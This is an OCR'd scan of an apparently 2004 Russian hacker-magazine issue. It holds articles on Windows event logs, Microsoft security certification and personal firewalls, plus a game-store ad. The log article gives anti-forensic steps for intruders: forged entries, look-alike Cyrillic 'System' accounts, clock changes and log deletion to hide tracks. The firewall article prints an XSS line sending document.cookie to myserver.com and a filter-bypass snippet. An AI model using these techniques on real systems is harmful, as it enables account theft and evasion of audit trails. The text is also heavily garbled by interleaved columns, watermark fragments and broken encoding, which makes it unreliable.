Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

Специальный выпуск 48_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

9.21 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 7 8 910 / 1410 11 12 13 14 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to

											m
w
	w									o
	.						g		.c
		p					g
			df			n		e
				-xcha

Измененные параметры в действии

Eventcreate позволяет вносить записи в логи из командной строки.

NTEVENTLOG WHERE LogFileName=”

System” SET OverwriteOutDated=1

(для задания максимального срока хранения записей журнала «Система» в 1 день).

Кроме изменения настроек, псевдоним NTEVENTLOG позволяет просмотреть все свойства выбранного журнала событий:

NTEVENTLOG WHERE LogFileName=”Application” GET /VALUE

Если требуется «интеллектуальное» изменение настроек без участия че- ловека, то нетрудно и написать обо- лочку-сценарий для этой команды. Один из вариантов такой оболочки показан во врезке.

УНИКАЛЬНЫЙ ПОЧЕРК ИЛИ ОПАСНАЯ УЛИКА?

По привычке руки набивают знакомые VBScript-операторы, в результате чего возникает сценарий, вносящий в журналы системы нужные записи.

Закончив любование проделанной работой, я захотел проверить ее ре-

зультаты. Каково же было разочарование, когда в столбце журнала «Источник» («Source Type») обнаружилось разоблачающее взломщика зна- чение «WSH». Панику смягчало лишь отсутствие указания на юзера, внесшего запись «Пользователь» – «Н/А» («User Name» - «N/A»). Нужно было искать другой путь. И он был найден.

ОПЕРАЦИОННАЯ СИСТЕМА ДЛЯ ХАКЕРА

Из глубин подсознания нахлынули давние воспоминания. Робко просматриваю справочную систему Windows и нахожу в справочнике по командной строке неприметную, но не менее от этого важную команду eventcreate, с помощью которой можно вносить записи в журналы событий непосредственно из командной строки.

Основное преимущество вышеуказанной команды перед сценариями WSH – возможность напрямую указать имя источника и пользователя. Правда, пользователь должен существовать, и пароль его должен быть известен. Кроме того, системные источники вроде «Userenv» или

Такой источник нам не нужен

Интересная учетная запись

«MsiInstaller» заблокированы, а вносить запись от имени пользователя «System» не представляется возможным. Выдается сообщение «Ошибка: исходный параметр используется только для определения приложения или сценария (невстроенные источ- ники)». Но, к счастью, для этой проблемы есть решение, которое лежит на поверхности. Суть в том, что некоторые символы латинского и кириллического алфавита имеют практи- чески одинаковый вид (по крайней мере, в шрифтах Windows), но разные коды. «А» латинское и «А» кирилли- ческое – не одно и то же, хотя и выглядят одинаково. Если создание учетной записи «System» невозможно, то пользователь «System» (с кириллической «е») добавляется на «Ура». После создания учетной записи от ее имени можно вносить события в системный журнал, а затем удалять в целях конспирации. Аналогич- ная подмена действует и на указание «Источника».

Остается еще одна проблема – дата и время внесения записи. На самом деле, при наличии прав Администратора это далеко не проблема, а, скажем так, небольшое препятствие. Все решается обычным переводом календаря и часов, что вполне осуществи-

мо средствами командной строки и » сценариев.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

Имитация источника записи «Userenv» заменой латинской «е» на кириллическую

… и наслаждаемся результатами

hang

NOW!

BUY

ЗАЩИТА

БОРТОВОЙЖУРНАЛ

w Click

f-xchan

ВНОСИМ ЗАПИСИ В ЛОГИ

ÑÀÌÈ

'Объявляются используемые

N D

переменные

Option Explicit

Dim WshShell, LEvent

Dim Ltype,LMsgevent,Lcomputer

'Ltype -Код типа события

'0 - Успех (Success)

Судя по логам, произошел скачек во времени :)

'1 - Ошибка (Error)

Как резюме ко всему здесь написан-

'2 - Предупреждение (Warning)

'4 - Уведомление (Information)

ному. Схематично процедура удале-

'8 - Аудит успехов (Audit_Sucess)

ния записи об определенных событи-

'16 - Аудит отказов (Audit_Failure)

ях выглядит так:

'LMsgevent - Текстовое сообщение

Сохранение некоторых записей

'Lcomputer - Дополнительный

журнала событий в отдельный источ-

параметр, указывающий имя

íèê

компьютера для записи события на

Создание учетных записей со спе-

удаленной машине

цифическими именами

Ltype = 2

Очистка журнала событий

LMsgevent = "Настрой фаервол!"

Считывание записей из архива

'Получается доступ к системным

Изменение дат и времени и внесе-

объектам

ние считанных записей

Îäèí è òîò

Set

Удаление временных учетных за-

же диско-

WshShell=CreateObject("WScript.Shell")

писей

вый образ

'Вносится запись

может быть

Удаление архива записей

подключен

LEvent=WshShell.LogEvent(Ltype,LMsge

Установка текущей даты и времени

к несколь-

vent)

ким вирту-

альным ма-

ОТСЛЕЖИВАЕМ СОБЫТИЯ В

'Завершение работы сценария

шинам -

Wscript.Quit

удобно для

РЕАЛЬНОМ ВРЕМЕНИ

передачи

Несмотря на кажущуюся простоту

файлов

описанного способа иногда манипу-

между ними

или совме-

ляции с логами не имеют большого

правкой политик безопасности вос-

стного ис-

смысла, а, скорее, напоминают борь-

пользоваться средством мониторинга

пользова-

ния прило-

бу с симптомами заболевания, вместо

реестра, например RegFix. Изменен-

жений.

выяснения и удаления причины бо-

ные параметры можно сохранить и в

лезни. Многие записи в журналы со-

будущем править с помощью команд-

бытий вносятся благодаря настрой-

ных файлов и сценариев WSH.

кам параметров локальной политики.

Большую опасность представляют

Все описы-

Изменение локальной политики есть

приложения и сервисы, имеющие

не что иное, как редактирование ре-

свою собственную систему докумен-

ваемые

эмуляторы

естра в комфортной обстановке, то

тирования событий, иногда дублиру-

ты найдешь

есть через консоль ММС. В этом лег-

ющую записи в стандартные логи

на нашем

ко убедиться, если одновременно с

Windows. Также помимо пассивной

диске.

Secpol.msc – всего лишь удобный редактор реестра

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
регистрации произошедших измене- .								e
		p	df				g		.c
			df			n
				-x cha

ний могут производиться конкретные действия, например, отправка SMS или ICQ системному администратору. Однако и злой взломщик может не остаться в долгу, запустив сценарий, отслеживающий появление в логах записей определенного типа.

Альтернативой этому WSH-сцена- рию служит CMD-команда eventtriggers, которая создает в операционной системе так называемые триггеры, отслеживающие выполнение определенных условий в журнале событий и действующие в соответствии с ними.

Пример создания триггера, взятый из справочного файла:

eventtriggers /create /s srvmain /u maindom\hiropln /p p@ssW23 /tr "Отсутствие места на диске" /eid 4133 /t warning /tk \\server\share\diskcleanup.cmd

ЗА КАДРОМ

В статье, по причине ее ограни- ченного объема, не указан способ копирования записей из системных журналов в текстовый файл. Один из вариантов сценария, реализующего эти возможности, можно найти на прилагающемся к журналу диске, хотя лучшим примером, на мой взгляд, будет входящий в Windows XP Professional сценарий eventquery.vbs, на который, кстати, распространяется защита системных файлов. E

ОТСЛЕЖИВАЕМ ПОЯВЛЕНИЕ В ЛОГАХ ОПРЕДЕЛЕННОЙ ЗАПИСИ

'Объявляются используемые переменные

Option Explicit

Dim WshShell, LEvent

Dim Ltype,LMsgevent,Lcomputer 'Ltype -Код типа события

'0 - Успех (Success) '1 - Ошибка (Error)

'2 - Предупреждение (Warning) '4 - Уведомление (Information) '8 - Аудит успехов (Audit_Sucess) '16 - Аудит отказов (Audit_Failure)

'LMsgevent - Текстовое сообщение 'Lcomputer - Дополнительный

параметр, указывающий имя компьютера для записи события на удаленной машине

Ltype = 2

LMsgevent = "Настрой фаервол!" 'Получается доступ к системным

объектам Set

WshShell=CreateObject("WScript.Shell") 'Вносится запись LEvent=WshShell.LogEvent(Ltype,LMsge

vent)

'Завершение работы сценария Wscript.Quit

ХАКЕРСПЕЦ 11(48) 2004

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

hang

NOW!

BUY

ЗАЩИТА

СЕРТИФИКАЦИЯПРОГРАММОТMICROSOFT

w Click

Леший из-за Лукоморья (lukomore@xakep.ru)

СЕРТИФИКАЦИЯ

-xcha

I N D O W

ПРОГРАММ

ÀÍ

ÎÒ MICROSOFT

Ê À

НЕ ВСЕ ТАК ХОРОШО, КАК КАЖЕТСЯ

Ò À

последнее время Microsoft неустанно твердит о повышении уровня защищенности своей продукции, в особенности

Âоперационных систем Windows 2003 и Windows XP. Специалисты компании размахивают бумагами с печатями,

якобы подтверждающими безопасность творений MS. Какова на самом деле цена этих бумаг?

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	Ñ	ертификация - это не-
		зависимая экспертиза


		и подтверждение со-



		ответствия некоторым


		требованиям. В облас-

ти безопасности сертификация бывает двух типов: для людей и для программ. Пощупаем последнее. Заветная бумага является результатом долгого и непростого процесса проверки кодов программного обеспе- чения на соответствие формализованным критериям безопасности. Процесс этот длительный, дорогой и требует участия высококвалифицированных специалистов.

О ПРОЦЕССЕ

В чем отличие обычного бетатестирования от тестирования по безопасности, завершающегося выдачей сертификата? В подходе. В первом случае ищут ошибки, приводящие к сбоям и некорректной работе тестируемой программы, и просто орфографические ошибки в меню и справке. Но на безопасность эти ошибки влияют мало. Более того, программа может работать идеально, но быть абсолютно незащищенной. Представь, что программа шифрования PGP хранит секретный ключ шифрования в корне диска C: и этот ключ вычисляется за пару секунд на обычной персоналке. По бета-тестированию, в этом нет ничего предосудительного. А вот с точки зрения тестирования на безопасность это ключе- вые дыры, сводящие на нет эффективность тестируемой системы.

О КРИТЕРИЯХ

Система обычно тестируется не случайным образом, а на соответствие заранее определенным критериям по четкой методике. В России сейчас действует два набора таких критериев: уже устаревшие Руководящие документы Гостехкомиссии и так называемые "Общие критерии", введенные в действие с 1 января 2004 года. В этих документах прописаны требования к

Почему нельзя проверить все возможные конфигурации тестируемой системы? Вспомни школьный курс комбинаторики. У системы с 10 настройками по 2 возможных варианта будет 1024 различных конфигураций. У системы с 20 настройками по 2 возможных варианта будет 1048576 различных конфигураций. Теперь представь, что настроек несколько сотен и для каждой число возможных вариантов больше 2. Можно ли проверить все состояния работы такой системы?

Сертификационная лаборатория получит деньги за проверку, производитель получит заветную бумагу.

механизмам защиты, обязанным присутствовать в тестируемых средствах. Документов, входящих в "Общие критерии", много. Это более десятка профилей защиты под каждый из распространенных классов программных средств: операционные системы, базы данных, межсетевые экраны (firewall) и т.д. Руководящие документы Гостехкомиссии классифицировались аналогично. Но сейчас подход стал более гибким. Если видно, что под конкретный профиль ты не подпадаешь, то можно создать задание по безопасности, в котором укажешь только те требования, на соответствие которым ты и будешь тестировать свою систему.

Но такой подход несет в себе оче- видную угрозу: производитель может, например, написать задание, в котором будет всего одно требование, и проводить тестирование на соответствие ему. Сертификационная лаборатория получит деньги за проверку, производитель получит заветную бумагу. Только потребителя никто не будет спрашивать, устраивает ли его дырявый софт. А сам он проверить его, к сожалению, окажется не в состоянии.

С Windows XP произошла именно такая ситуация. Не имея возможности сертифицировать по высокому классу защиты, Microsoft разработала свое задание по безопасности и провела сертификацию Windows XP Professional Service Pack 1a "на соответствие реализованных в операционной системе функций защиты и задекларированных в задании по безопасности". Вдумайся в эту формулировку. Тестировались не механизмы защиты, а соответствие их реального наличия номенклатуре, указанной в документации. Можно ли удивляться тому, что с момента получения сертификата в Windows XP в начале этого года было обнаружено на момент написания этой статьи 37 дыр (по данным Security Focus).

Еще один аспект, связанный с "Общими критериями". В них вводится такое понятие, как "модель угроз", или "модель нарушителя". Ты проверяешь не просто наличие механизмов защиты, а возможность их

ХАКЕРСПЕЦ 11(48) 2004

hang

NOW!

BUY

w Click

эффективной работы по преодоле-

-xcha

нию конкретных угроз, которые мо-

Число строк кода в разных версиях Windows:

гут быть направлены на защищае-

мую систему. Очевидно, что чем

- Windows 2000 - 35 миллионов

больше угроз, тем сложнее подсис-

- Windows XP - 50 миллионов

тема защиты и процесс ее проверки

и сертификации. Microsoft и тут от-

По данным института Карнеги-Меллона, на 1000 строк кода прог-

личилась. Смотрим задание по безо-

раммы приходится от 5 до 15 ошибок, которые никак не проявля-

пасности (в котором и прописывает-

ются и не нарушают функционирования системы.

ся эта самая модель угроз) на ОС

Windows 2000. Что же мы видим? От

каких угроз защищает Windows

2000 (по мнению Microsoft)? Их все-

ãî 9 (!):

Особенность сертификации Windows 2000 в

фальсификация или потеря со-

бытий, хранимых в журнале регист-

том, что проверке подвергается не только

рации;

ОС, но и компьютер.

фальсификация или потеря

конфигурационных и иных критич-

ных данных;

несанкционированный доступ к

рится за пределами Windows 2000.

На мгновение представь невоз-

данным, оставшимся от предыдущих

Перехват трафика? Пожалуйста.

можное: соблюдены все ограниче-

пользователей (например, в файле

Утечка через инфракрасный порт,

ния, и Windows 2000 защищена от

подкачки или временных файлах);

Bluetooth, Wi-Fi-адаптер или flash-

угроз, не покрываемых сертифика-

маскировка под авторизованно-

диск? Пожалуйста. Кстати, послед-

том. Радостно потирая руки, ты счи-

го пользователя;

ние три периферийных устройства

таешь, что теперь твоя сеть надеж-

несанкционированный доступ к

вообще не указаны в списке разре-

но защищена, ибо это подтверждено

системе с правами администратора;

шенных на сертифицированных ма-

сертификатом. Рано радоваться.

несанкционированный доступ к

шинах Windows 2000. Хорошо, что

Особенность сертификации Windows

системным данным;

хоть сетевую карту можно исполь-

2000 в том, что проверке подверга-

модификация подсистемы защи-

зовать :). А то получилось бы как с

ется не только ОС, но и компьютер,

òû ÎÑ;

сертификатом на Windows NT 3.51.

на которую она устанавливается. А,

вывод из строя системы регист-

"Защитный" сертификат был, но...

следовательно, установка W2k на

рации событий;

только при условии отсутствия дис-

любую другую железку приводит к

фальсификация пользова-

ководов и сетевой карты. И кому

аннулированию сертификата, в ко-

тельских данных.

был нужен такой защищенный

тором четко прописаны модели

Стоит ли комментировать этот "ог-

компьютер? Более того, в ограниче-

компьютеров: Compaq Proliant

ромный" список? Почему именно от

ниях также указано, что все компь-

ML570 è ML330, Compaq

этих угроз защищена Windows

ютеры, с которыми может взаимо-

Professional Workstation

AP550, Dell

2000? Может, потому, что это было

действовать сертифицированный

Optiplex GX400, Dell PE

2500,

проще всего сделать? В модели на-

экземпляр Windows, могут нахо-

6450, 2550 è 1550.

рушителя сертифицированной

диться только в контролируемой

И последний подводный камень.

Windows XP еще меньше угроз - 5.

зоне (это в интернете-то?), на них

Можно ли провести серьезную про-

DoS-атаки вообще не рассматрива-

должны распространяться те же са-

верку на защищенность без доступа

ются как угроза для операционной

мые требования политики безопас-

к исходным текстам, тем более для

системы MS.

ности, а их пользователи должны

операционной системы? Ответ ясен.

В ограничениях к сертификату

пройти проверку на благонадеж-

Однако Microsoft отличилась и тут.

четко написано, что Microsoft не не-

ность. Совсем оторванные от жизни

Сертификация Windows XP была

сет ответственности за все, что тво-

требования!

блестяще проведена без оных, так

как уровень доверия (еще один тер-

мин из "Общих критериев") к безо-

За время, требуемое на сертификацию,

пасности операционной системы не

предполагал анализа исходных текс-

операционная система

тов программ.

успевает обновиться

О ВРЕМЕНИ

Вот что мы читаем на официальном сайте Гостехкомиссии (www.gostexkom.ru): «Государственная техническая комиссия России является федеральным органом исполнительной власти, осуществляющим межотраслевую координацию и функциональное регулирование деятельности по обеспечению защиты (некриптографическими методами) информации, содержащей сведения, составляющие государственную или служебную тайну, от ее утечки по техническим каналам, от несанкционированного доступа к ней, от специальных воздействий на информацию и по противодействию техническим средствам разведки на территории Российской Федерации».

Очевидно, что чем объемней
анализируемый продукт, тем дольше
процесс анализа. Первая российс-
кая сертификация Windows NT и MS
SQL Server длилась 3 года, как и
сертификация Windows 2000 за ру-
бежом. А вот Windows XP наши "спе-
циалисты" освоили за 10 месяцев.
За время, требуемое на сертифика-
цию, операционная система успева-
ет обновиться одним или двумя
Service Pack’ами, а также возможен
вариант, когда появление сертифи-
ката совпадет с выходом новой вер-
сии ОС. Например, вполне вероятно,
что завершение затеянной сертифи-
кации Windows 2003 по срокам сов-
падет с выходом Longhorn.	»

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

Осенью 2003 года семь известных специалистов по информационной безопасности направили в правительство США доклад, в котором говорилось, что продукция Microsoft представляет угрозу национальной безопасности. Буквально сразу после публикации этого доклада один из его авторов, техни- ческий директор @Stake Дэн Гир, был уволен.

Билла Гейтса, компания Microsoft затратила 500 чело- веко-лет на то, чтобы сделать Windows 2000 безопасной и надежной операционной системой.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha
	W I N D O W S
	Í À
	À Ò À Ê À

По данным SANS Internet Storm Center (www.isc.sa ns.org), среднее время между подклю- чением непатченой машины с Windows к интернету и до момента атаки на нее или заражения червем составляет всего 16 минут.

Сертификат ¹844, выданный по результатам сертификационных испытаний, подтверждает, что операционная система Microsoft Windows XP Professional (Service Pack 1a) соответствует заданию по безопасности MS.Win_XP_ SP1a.ЗБ и имеет оценочный уровень доверия ОУД1, усиленный компонентом AVA_SOF.1.

hang

NOW!

ЗАЩИТА

СЕРТИФИКАЦИЯПРОГРАММОТMICROSOFT

BUY

w Click

О ЛЮДЯХ

Все, даже самые серьезные, ме-

Число дыр в уже сертифицированных версиях Windows (по

-x cha

ханизмы защиты не способны про-

данным Security Focus на момент написания статьи):

тивостоять человеческой глупости

и некомпетентности. Будешь хра-

- Windows NT Workstation – 107

нить секретные ключи в корневом

разделе диска или выберешь пус-

- Windows NT Server – 117

той пароль для своей учетной запи-

- Windows 2000 Professional – 97

си, и безопасность самой надежной

- Windows 2000 Server – 45

и сертифицированной системы бу-

- Windows 2000 Advanced Server – 103

дет равна нулю :).

- Windows XP Professional - 37

А кто проводит сертификацию?

Те же люди, которые хотят полу-

чать достойную зарплату и квали-

фикация которых должна быть не

ниже той, которой обладают раз-

12 февраля этого года сертификация

работчики тестируемого ПО. Дос-

таточно интересна дискуссия, раз-

Windows XP была успешно завершена, а

вернувшаяся на форуме сайта

sec.ru. В ней сотрудник сертифика-

сертификация Windows 2003 продолжается.

ционной лаборатории делится сек-

ретами своей кухни, из чего стано-

Надо сказать, что гораздо раньше

вится ясно, как проводится у нас

кации NT и 2000, можно предполо-

сертификация и чего стоят полу-

Windows NT 3.51 была сертифициро-

жить, что и Windows 2003 будут про-

ченные сертификаты.

вана в Америке по уровню C2, но,

верять не менее 3 лет – ждать оста-

учитывая «распространенность»

ëîñü äâà ãîäà :).

ИСТОРИЯ ВОПРОСА

этой версии в России, можно о ней

В России Microsoft уже неоднок-

смело забыть.

В ИТОГЕ

ратно проходила по этой дорожке.

В конце октября 2002 года корпо-

Несмотря на все заявления

Первый раз это произошло в дале-

рация Microsoft объявила о получе-

Microsoft о повышении уровня за-

ком 1999 году, когда российское

нии платформой Microsoft Windows

щищенности ее изделий и получе-

представительство программного

2000 (Professional, Server è

ние ими сертификатов соответствия

гиганта сертифицировало 3 своих

Advanced Server) сертификата на со-

требованиям по безопасности, ситу-

продукта: Windows NT Server 4.0,

ответствие западной редакции «Об-

ация не такая радужная. Некоторые

Windows NT Workstation 4.0 è MS

щих критериев». Сертификация шла

всемирно известные специалисты

SQL Server 6.5. Работа эта велась в

около 3 лет.

(среди них и Брюс Шнайер) обвиня-

интересах Минатома России в рам-

27 марта прошлого года был начат

ют компанию, возглавляемую Бил-

ках соглашений с Министерством

процесс сертификации Windows XP

лом Гейтсом, в создании угрозы на-

Энергетики США по контролю за не-

и Windows 2003 Server на соответ-

циональной безопасности. А кто-то

распространением ядерных матери-

ствие «Общим критериям». 12 фев-

идет дальше, сравнивая рост инс-

алов. Сей процесс длился 3 года и

раля этого года сертификация

талляций ОС Windows со стихийным

завершился 18 марта 1999 года по-

Windows XP была успешно заверше-

бедствием.

лучением сертификатов Гостехко-

на, а сертификация Windows 2003

Известная независимая консалтин-

миссии России.

продолжается. Зная сроки сертифи-

говая компания Gartner Group

(www.gartner.com) не осталась в сторо-

не от этой проблемы и неоднократно

Все, даже самые серьезные, механизмы

рекомендовала всем пользователям

отказаться от решений компании

защиты не способны противостоять

Microsoft по причине их низкой за-

щищенности:

человеческой глупости и некомпетентности.

19 сентября 2001 года – после

эпидемии Nimda;

15 мая 2003 года – после обна-

ружения дыры в Microsoft Passport;

W W W

12 августа 2004 года – после за-

явления о выпуске Windows XP

www.sec.ru/forum2__1.cfm?posa=1&stpa=10&threadid=

Starter Edition.

716&read=1&stp=20&pos=1& - обсуждение российской системы

Призывать к этому, конечно, глу-

по, так как нет ни одной по-насто-

сертификации.

ящему защищенной операцион-

www.niap.nist.gov/cc-scheme - все об «Общих критериях».

ной системы. Но и рассчитывать,

www.altx.ru - сайт строительной компании «Алтэкс-Строй»,

что даже сертифицированные эк-

занимающейся послепродажным обслуживанием

земпляры этой ОС будут защище-

сертифицированной ОС Windows XP.

ны лучше, чем все остальные, не-

разумно. Поэтому, как всегда, ос-

www.microsoft.com/rus/general/press/1999/march/sertifica-

тается надеяться только на себя:

tion.htm - сертификация Windows NT в 1999 годó.

своевременно патчить систему,

www.microsoft.com/rus/security/articles/common_criteria/

установить и регулярно обнов-

intro.mspx - сертификация Windows 2000 в 2002 году.

лять антивирус и персональный

www.microsoft.com/rus/news/issue.asp?12-02-2004-win-

межсетевой экран - невзирая на

«независимые» бумаги и заявле-

dowsxp.xml – сертификация Windows XP в 2004 году.

ния производителя о защищен-

www.gostexkom.ru - официальный сайт Гостехкомиссии.

ности его творений. E

ХАКЕРСПЕЦ 11(48) 2004

hang

NOW!

У НАС ОЧЕНЬ БОЛЬШОЙ

BUY

w Click

-xcha

-x cha

В нашем магазине вас

* Постоянно

* Чем больше,

ВЫБОР

ждет более 1000 игр

обновляемый

тем дешевле!

на ваш выбор

ассортимент

	Doom 3		Rome: Total War		Sims 2		Silent Hill 4: The Room	Half-Life 2		Myst IV Revelation

$75,99		$79,99		$22,99		$59,99		$85,99	$69,99

World of Warcraft	Star Wars Galaxies:	Final Fantasy XI: Chains	EverQuest II DVD	Metal Gear Solid 2:	Ultima Online:
	Jump to Lightspeed	of Promathia Expansion		Substance	Samurai Empire

$79,99	$59,99	$59,99	$79,99	$59,99	$59,99

Играй	ЗАБУДЬ ПРО ТЕЛЕЖКИ
просто!	ЗАБУДЬ ПРО ТЕЛЕЖКИ
GamePost	МЫ ПРИВЕЗЕМ ВСЕ САМИ!

hang

NOW!

BUY

ЗАЩИТА

ЗАЩИТАСНАРУЖИИИЗНУТРИ

w Click

(c)oded by Lame@pochta.ru

-xcha

ЗАЩИТА СНАРУЖИ

O W S

À W I N D

И ИЗНУТРИ

Ê À

ПЕРСОНАЛЬНЫЕ ФАЕРВОЛЫ

Ò À

последнее время большое распространение получили персональные межсетевые экраны (иначе «брандмауэры»,

Â«фаерволы»). Они позволяют защитить рабочие станции от проникновения на них вредоносного кода, а также от

утечки информации через троянские программы.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	Î	днако, как любое сред-
		ство защиты, фаервол


		делает только то, что в



		него заложил разра-


		ботчик. Вот основные

функции, которые реализуют персональные МСЭ:

фильтрация трафика на сетевом уровне

фильтрация содержимого прикладных протоколов

ограничение сетевой активности приложений и контроль утечки данных

ФИЛЬТРАЦИЯ ТРАФИКА НА СЕТЕВОМ УРОВНЕ

Основной защитный механизм, который реализует любой межсетевой экран, - фильтрация трафика. Фильтрация предполагает анализ пакетов, проходящих с одного интерфейса межсетевого экрана на другой, с целью проверки на соответствие политике безопасности. В случае если пакет соответствует разрешающему правилу, он ретранслируется межсетевым экраном, иначе - отбрасывается. В зависимости от глубины проверки передаваемых данных, а также критериев фильтрации различают несколько типов межсетевых экранов. Например, простой пакетный фильтр рассматривает каждый пакет отдельно от других и в качестве критериев фильтрации использует заголовки сетевого и транспортного уровней, то есть IP-адреса отправителя и получа- теля, номера TCP/UDP-портов и т.д. Обмануть такой межсетевой экран – все равно, что отобрать у ребенка конфету: просто, но стыдно.

Более продвинутые межсетевые экраны (stateful) осуществляют фильтрацию в контексте соединения. Они не только анализируют дополнительные поля заголовков пакетов (такие, как состояние флагов SYN, ACK, FIN, RST и значения Sequence Number), но и помнят их значение для предыдущих пакетов. Поэтому могут отличить «подделанный» пакет от тех, которые принадлежат данному разрешенному соединению. Большинство персональных межсетевых экранов являются, как ми-

нимум, stateful МСЭ для TCP/UDP/ICMP. То есть умеют, по крайней мере, разли- чать, кто и в каком направлении установил соединение, и считать Sequence Numbers пакетов.

Установив персональный межсетевой экран в «правильной» стандартной конфигурации, можешь не бояться злобных червей типа Sasser или MSBlast, стучащихся на открытые 445-й и 135-й порты. Хотя, если честно, непонятно, зачем оставлять на компьютере неиспользуемую сетевую службу. Не хочешь ты, чтобы CIFS/SMB/NetBIOS (порты 137, 138, 139, 445) светилось наружу – останови службу “Server”. Не нужен тебе 135-й порт – привяжи RPC к 127.0.0.1 утилитой rpccfg и не мучайся. Нормально настроенный пользовательский компьютер при сканировании nmap должен, максимум, отвечать на ping. И не потому что на нем стоит фаервол, а потому что на нем просто никто не слушает сеть. Но чтобы реализовать подобное стандартными средствами Windows, надо хотя бы знать, что за сетевой софт стоит на машине. В то время как персональные межсетевые экраны разбираются в этом сами.

Кстати, чтобы определить, какие программы слушают сеть на твоей машине, совершенно не обязательно устанавливать программы типа fport или activeport. В Windows для этого можно воспользоваться двумя командами: netstat и tasklist (в ранних версиях Windows). Команда netstat –ano выдает список сетевых соединений и открытых портов, указывая идентификатор процесса (PID), который это соединение использует. Чтобы узнать, какому процессу принадлежит этот PID, можно воспользоваться диспетчером задач или просто запустить tasklist. Программа tasklist, запущенная с ключом -svc, позволяет узнать, какие сетевые службы (сервисы) обслуживаются тем или иным процессом.

Поскольку фильтрация трафика является старым и наиболее проработанным методом защиты, обойти ее «в лоб» довольно трудно. Если межсетевой экран запрещает входящие сое-

динения, то установить соединение с сервисом на машине невозможно (если только в Bugtraq не промелькнуло что-то интересное). Поэтому чаще всего проникают на компьютеры с установленным межсетевым экраном через клиентские приложения.

ФИЛЬТРАЦИЯ СОДЕРЖИМОГО ПРИКЛАДНЫХ ПРОТОКОЛОВ

Если напрямую пробить персональный межсетевой экран не удалось, это делают через клиентское приложение. Основные векторы атак на клиентов - это Web, почта и дырки в головах пользователей. Причем часто эти векторы используются совместно. Например, приходит письмо, в котором под видом свежего крякера интернета лежит троян, отсылающий пароли на вражеский web-сервер. От социотехники и других методов честного обмана пользователей межсетевые экраны, конечно, не защищают.

Если внимательно проанализировать Bugtraq, то окажется, что наибольшее количество ошибок приходится именно на клиентские программы. Впереди планеты всей здесь, естественно, Internet Explorer, но и другие программы не отстают. Даже в милой сердцу любого юниксоида утилите mail в свое время были найдено переполнение буфера (www.security.nnov.ru/search/news.asp?binid=2872). Однако персональные межсетевые эк-

ХАКЕРСПЕЦ 11(48) 2004

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.							раны не дремлют и в этом случае.
	.							.c
		p					g
			df			n		e
				-xcha

Многие из них реализуют функцию фильтрации содержимого (content-fil- ter), то есть умеют работать на прикладном уровне протокола TCP/IP.

Давай представим следующую ситуацию. У тебя стоит почтовый contentfilter, настроенный на фильтрацию по ключевым словам. Вдруг приходит почтовое сообщение, содержащее архив ZIP, в котором есть документ Word, в который вставлена таблица Excel, в одном из столбцов которого содержатся нехорошие слова, предположим, «Mega Secret Data». Content-filter соберет из отдельных пакетов все почтовое сообщение, найдет в нем архив, развернет его, просмотрит все объекты в документе Word, обнаружит таблицу Excel и нехорошие слова в ней, после чего заблокирует данное сообщение.

Кроме того, эти фильтры могут отсекать компоненты ActiveX, скрипты JavaScript и VBScript, почтовые вложения с расширениями exe и src. Находит хакер на сервере www.pochtamail.org уязвимость типа Cross-Site- Scripting и начинает пробамбливать клиентов этого сервера почтовыми сообщениями, тихонько уводящими их пароли. Но вожделенный location.href=”myserver.com&”+document.cookie почему-то не отрабатывает на их машинах. В этом может быть виноват персональный МСЭ, обрезающий потенциально небезопасное содержимое – сценарии.

КАК ПРОБИВАЕТСЯ ЗАЩИТА

Фильтры содержимого далеко не всегда могут распознать вредоносный контент. Это связанно с тем, что полностью представить себе поведение клиентской программы практически невозможно. Ни разу не замечал, как программа из пары сотен строк, работавшая вчера, сегодня начинает вытворять непонятно что? Здесь то же самое: фаервол думает одно, а браузер или почтовая программа – совсем другое.

Например, межсетевой экран настроен на запрет VBScript. И пользователь получает страницу, на которой присутствует подобный код:

language=vbscript>alert "÷ìîê"<\/script>') </script>

С точки зрения фаервола, это безобидный JavaScript, а, с точки зрения браузера, это два скрипта. Когда Internet Explorer начнет обрабатывать подобную конструкцию, JavaScript создаст в теле страницы динамический сценарий, написанный на запрещенном VBScript. Подобные проблемы были еще в 2002 году подробно описаны 3APA3ой (www.security.nnov.ru/advisories/content.asp), и, оказывается, они актуальны до сих пор.

